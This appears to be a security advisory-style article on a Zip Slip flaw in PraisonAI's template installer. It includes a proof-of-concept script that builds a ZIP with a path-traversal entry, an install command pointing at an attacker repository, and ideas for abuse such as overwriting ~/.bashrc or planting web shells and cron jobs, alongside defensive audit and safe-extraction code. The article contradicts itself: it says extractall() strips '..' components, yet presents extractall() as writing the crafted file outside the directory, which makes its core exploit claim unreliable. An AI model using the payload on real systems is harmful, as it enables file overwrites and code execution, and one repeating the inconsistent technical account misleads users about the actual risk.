PraisonAI, an open-source framework for building AI agents with YAML configurations, exposes users to arbitrary file writes through its template installation feature. Attackers can craft malicious ZIP archives hosted on GitHub that overwrite files anywhere on a victim’s filesystem during extraction. This Zip Slip vulnerability sits in the CLI code at src/praisonai/praisonai/cli/features/templates.py, line 852, where the app calls Python’s zipfile.extractall(tmpdir) without path normalization or traversal checks.
The issue stems from trusting external ZIP files without validation. Users run praisonai templates install github:repo/template, and the app downloads the archive and extracts it directly into a temp directory. A malicious archive with paths like ../../../../../../../tmp/evil.txt slips past the extraction boundary, writing files wherever the running user has permission. Python's standard library zipfile module offers only partial, largely undocumented protections: extract() and extractall() strip drive letters, leading separators, and ".." path components (bpo-6972, since Python 3.3.1), but member-by-member extraction via ZipFile.open() gets no such guard, and none of this is a contract callers should rely on. PraisonAI performs no validation of its own, leaving safety to whatever the interpreter happens to do.
Vulnerability Mechanics
Zip Slip, first documented in 2018 by Snyk researchers, has plagued dozens of applications, from Jenkins to Apache Struts. It exploits the ZIP format's lack of path enforcement: archives store filenames as arbitrary strings, and naive extractors write them verbatim. In PraisonAI, the flow is straightforward: download the ZIP from GitHub, create a tmpdir, call extractall(). No prefix stripping, no os.path.normpath() checks, no sandboxing.
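The verbatim-write pattern is easy to reproduce. Here is a minimal sketch of such a naive extractor (a hypothetical helper, not PraisonAI's actual code) showing why ../ entries escape the destination:

```python
import os
import zipfile

def naive_extract(zip_path: str, dest: str) -> None:
    """Write each archive entry's name verbatim under dest.

    This is the pattern Zip Slip abuses; never use it on untrusted input.
    """
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # os.path.join keeps '../' components, so the final path
            # can resolve outside dest entirely.
            target = os.path.join(dest, info.filename)
            os.makedirs(os.path.dirname(target) or dest, exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as out:
                out.write(src.read())
```

Any extraction routine that joins the destination with the raw member name, as above, inherits the bug regardless of language.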
Here’s the vulnerable snippet:
zip_ref.extractall(tmpdir)
Attackers generate payloads easily:
import zipfile

with zipfile.ZipFile('malicious_template.zip', 'w') as z:
    z.writestr('../../../../../../../tmp/zip_slip_pwned.txt', 'pwned by zip slip')
Install via CLI:
$ praisonai templates install github:attacker/malicious_template
Result: /tmp/zip_slip_pwned.txt appears, confirming the write.
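Until a fix ships, users can vet archives before extracting anything. A small audit helper (illustrative; the function name is mine) flags entries that would escape the extraction directory:

```python
import os
import zipfile

def find_unsafe_members(zip_path: str) -> list:
    """Return archive entries that would escape the extraction directory.

    Flags absolute paths and any name whose normalized form climbs upward.
    """
    unsafe = []
    with zipfile.ZipFile(zip_path) as zf:
        for name in zf.namelist():
            # normpath collapses 'a/../b' so hidden traversals surface too
            norm = os.path.normpath(name)
            if os.path.isabs(norm) or norm.startswith(".."):
                unsafe.append(name)
    return unsafe
```

Run it over a downloaded template before installing; a non-empty result means the archive should be discarded.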
Real-World Impact
This hits every PraisonAI user who installs community templates, a common way to share agent workflows. Overwrite ~/.bashrc to inject shell commands, corrupt Python site-packages, or (with an extractor that preserves permission bits) drop SUID binaries for privilege escalation. On multi-user systems or servers it enables RCE: imagine a template writing a web shell to /var/www or a cron job. Permissions limit the worst cases, but user-writable dirs like /tmp, the home directory, or app data fall easily.
Why this matters in 2024: AI agent tools like PraisonAI are exploding in popularity, with GitHub repos racking up thousands of stars and forks. Community templates drive adoption, mimicking the npm and PyPI ecosystems but without their supply chain safeguards. PraisonAI's 1k+ stars (as of last check) mean widespread exposure. Similar slips have hit tools like Poetry (fixed in 2020) and pip (mitigated via safe extraction). Attackers phish via Discord, Twitter, or fake repos: github:awesome-ai-agents/cool-template hides malice.
Skeptically, PraisonAI's maintainers could fix this in hours: wrap extraction in a safe function that resolves each member's destination and refuses anything landing outside the target directory. Note that the extraction filters added by PEP 706 (Python 3.12) cover tarfile, not zipfile, so an explicit manual check remains the portable answer. Until patched (check the latest release), avoid untrusted templates; verify archive contents first with unzip -l, or extract only in an air-gapped environment.
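Concretely, the safe wrapper is a few lines. A sketch (the function name is mine, assuming a POSIX filesystem) that validates every member against the resolved destination before delegating to extractall():

```python
import os
import zipfile

def safe_extractall(zf: zipfile.ZipFile, dest: str) -> None:
    """Reject any archive member whose resolved path escapes dest.

    Sketch only: assumes a POSIX filesystem; harden before production use.
    """
    dest_root = os.path.realpath(dest)
    for info in zf.infolist():
        target = os.path.realpath(os.path.join(dest_root, info.filename))
        # The commonpath check rejects both '../' traversal and absolute
        # names, since os.path.join discards dest_root for absolute paths.
        if os.path.commonpath([dest_root, target]) != dest_root:
            raise ValueError(f"blocked traversal entry: {info.filename!r}")
    zf.extractall(dest_root)
```

Failing closed with an exception, rather than silently skipping bad entries, also gives users a signal that the template itself is hostile.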
Broad implications: in crypto and security circles, we see this as a supply chain red flag. AI frameworks pull external code routinely; one bad ZIP equals persistence. Users: audit templates, run installs in containers (Docker confines writes to the container filesystem), or disable the feature. Devs: resolve every member path with os.path.realpath and reject anything outside the destination before extracting. This isn't novel, but unpatched in an active project? Sloppy. Scan your deps: archive extraction vulns persist because extraction feels "safe enough."
Bottom line: Pause template installs. Fork and patch if needed. In a world of AI hype, basic file hygiene separates toys from tools.